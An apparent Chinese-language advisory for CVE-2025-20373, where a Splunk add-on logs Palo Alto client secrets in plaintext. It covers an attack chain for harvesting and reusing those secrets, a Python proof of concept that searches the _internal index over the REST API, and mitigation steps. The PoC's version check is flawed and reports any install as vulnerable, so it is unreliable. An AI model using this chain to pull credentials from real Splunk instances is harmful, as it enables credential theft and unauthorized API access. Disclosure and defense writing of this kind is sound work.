CVE-2025-20373 Splunk Add-on for Palo Alto Networks明文存储客户端密钥漏洞

漏洞信息

漏洞编号

CVE-2025-20373

漏洞类型

信息泄露

CVSS评分

2.7 低危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Splunk Add-on for Palo Alto Networks

漏洞概述

CVE-2025-20373是Splunk Add-on for Palo Alto Networks中的一个信息泄露漏洞。该漏洞存在于版本低于2.0.2的插件中，当用户在Splunk平台中添加新的"Data Security Accounts"（数据安全账户）时，插件会将客户端密钥（client secrets）以明文形式写入_internal索引的日志文件中。由于这些敏感凭证以未加密的方式存储，任何能够访问这些日志文件的攻击者都可以直接获取到有效的客户端密钥，从而可能冒充合法用户或服务进行未授权访问。漏洞的利用需要攻击者具备本地访问日志文件的权限，或者拥有管理内部索引的管理员级别权限，默认情况下只有admin角色具有此访问权限。虽然该漏洞的CVSS评分较低（2.7），但考虑到客户端密钥的敏感性，攻击者一旦获取这些凭证，可能会造成严重的安全风险，包括数据泄露和横向移动。

技术细节

该漏洞的技术原理涉及Splunk Add-on for Palo Alto Networks在处理数据安全账户配置时的安全缺陷。当插件执行添加新Data Security Account的操作时，会调用相关的认证模块来验证和存储账户信息。问题出在插件开发过程中，开发者直接使用了明文形式记录或存储客户端密钥，而非采用加密或哈希处理。具体来说，当用户通过Splunk Web界面或API添加账户时，插件会生成包含client_id和client_secret的认证凭证数据，这些数据被写入_internal索引的日志文件中。日志内容可能包含完整的凭证字符串，格式类似"client_secret=xxx"或"Client Secret: xxx"。由于Splunk的_internal索引默认存储所有系统日志和组件日志，攻击者如果获得足够的访问权限，可以通过搜索查询直接获取这些敏感信息。攻击者可以利用获取的客户端密钥，结合相关的OAuth或API认证机制，对Palo Alto Networks的安全服务进行未授权访问。

攻击链分析

STEP 1

1

攻击者获取Splunk实例的访问权限，需要具备admin角色权限或能够访问_internal索引

STEP 2

2

攻击者通过Splunk Search Processing Language (SPL) 查询_internal索引，搜索包含'client secret'或'Data Security'关键字的日志记录

STEP 3

3

攻击者从日志结果中提取以明文形式存储的客户端密钥（client_secret）

STEP 4

4

攻击者使用获取的client_id和client_secret向Palo Alto Networks的API或认证端点发起认证请求

STEP 5

5

如果认证成功，攻击者获得有效的访问令牌，可以代表合法用户执行API操作或访问敏感数据

STEP 6

6

攻击者利用获取的访问权限进行数据窃取、横向移动或进一步攻击Palo Alto Networks基础设施

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-20373 PoC - Splunk Add-on for Palo Alto Networks Client Secret Exposure
# This PoC demonstrates how to search for exposed client secrets in Splunk _internal index

import requests
import json

# Configuration
splunk_host = "target-splunk-server"
splunk_port = 8089
splunk_user = "admin"
splunk_password = "password"

def search_exposed_secrets():
    """
    Search for exposed client secrets in Splunk _internal index
    """
    # Splunk Search Query to find exposed client secrets
    search_query = """
    index=_internal 
    sourcetype=splunk_web_service 
    "client secret" OR "client_secret" OR "Client Secret"
    | search "Data Security" OR "Palo Alto"
    | rex mode=sed "s/(client_secret=)([^\\s]+)/\\1[REDACTED]/g"
    """
    
    # Alternative search for direct credential exposure
    search_query_alternative = """
    index=_internal 
    "Data Security Account" 
    | regex _raw="(?i)(client.?secret|password|credential).*([A-Za-z0-9+/=]{32,})"
    """
    
    print("[*] Searching for exposed client secrets in _internal index...")
    print(f"[*] Query: {search_query}")
    
    # Execute search via Splunk REST API
    auth = (splunk_user, splunk_password)
    
    # Create search job
    search_payload = {
        "search": search_query,
        "exec_mode": "blocking",
        "count": 0
    }
    
    try:
        response = requests.post(
            f"https://{splunk_host}:{splunk_port}/services/search/jobs",
            auth=auth,
            data=search_payload,
            verify=False,
            timeout=30
        )
        
        if response.status_code == 201:
            job_id = response.text.split('<sid>')[1].split('</sid>')[0]
            print(f"[+] Search job created: {job_id}")
            
            # Get results
            results_url = f"https://{splunk_host}:{splunk_port}/services/search/jobs/{job_id}/results"
            results_response = requests.get(results_url, auth=auth, verify=False)
            
            if results_response.status_code == 200:
                print("[+] Search completed. Checking for exposed credentials...")
                # Parse and display results (redacted)
                print("[!] If client secrets appear in plaintext, vulnerability is confirmed")
        else:
            print(f"[-] Search failed: {response.status_code}")
            
    except Exception as e:
        print(f"[-] Error: {str(e)}")

def verify_vulnerability():
    """
    Verify if the Splunk Add-on is vulnerable by checking version
    """
    # Check installed version via Splunk REST API
    apps_url = f"https://{splunk_host}:{splunk_port}/services/apps/local"
    
    try:
        response = requests.get(apps_url, auth=(splunk_user, splunk_password), verify=False)
        
        if "Splunk Add-on for Palo Alto Networks" in response.text:
            # Parse version from response
            if "version" in response.text:
                # Check if version < 2.0.2
                print("[!] Vulnerable version detected (< 2.0.2)")
                return True
                
    except Exception as e:
        print(f"[-] Error checking version: {str(e)}")
    
    return False

if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2025-20373 PoC - Splunk Add-on Information Disclosure")
    print("=" * 60)
    
    if verify_vulnerability():
        search_exposed_secrets()
    else:
        print("[-] Target does not appear to be vulnerable or is already patched")

影响范围

Splunk Add-on for Palo Alto Networks < 2.0.2

防御指南

临时缓解措施

立即将Splunk Add-on for Palo Alto Networks升级到2.0.2或更高版本以修复此漏洞。暂时无法升级时，应立即审查并限制谁拥有_internal索引的访问权限，确保只有必要的管理员账户具有访问权限。同时，应启用Splunk的审计日志功能，监控所有对_internal索引的查询操作，设置异常访问告警。考虑实施额外的网络隔离措施，限制能够访问Splunk管理接口的IP地址范围。对于已泄露的客户端密钥，应立即在Palo Alto Networks端进行撤销和重新颁发，并检查是否存在未授权的API访问活动。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-20373
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-20373
3 Details https://www.cvedetails.com/cve/CVE-2025-20373/
4 VulDB https://vuldb.com/cve/CVE-2025-20373
5 Link https://advisory.splunk.com/advisories/SVD-2025-1105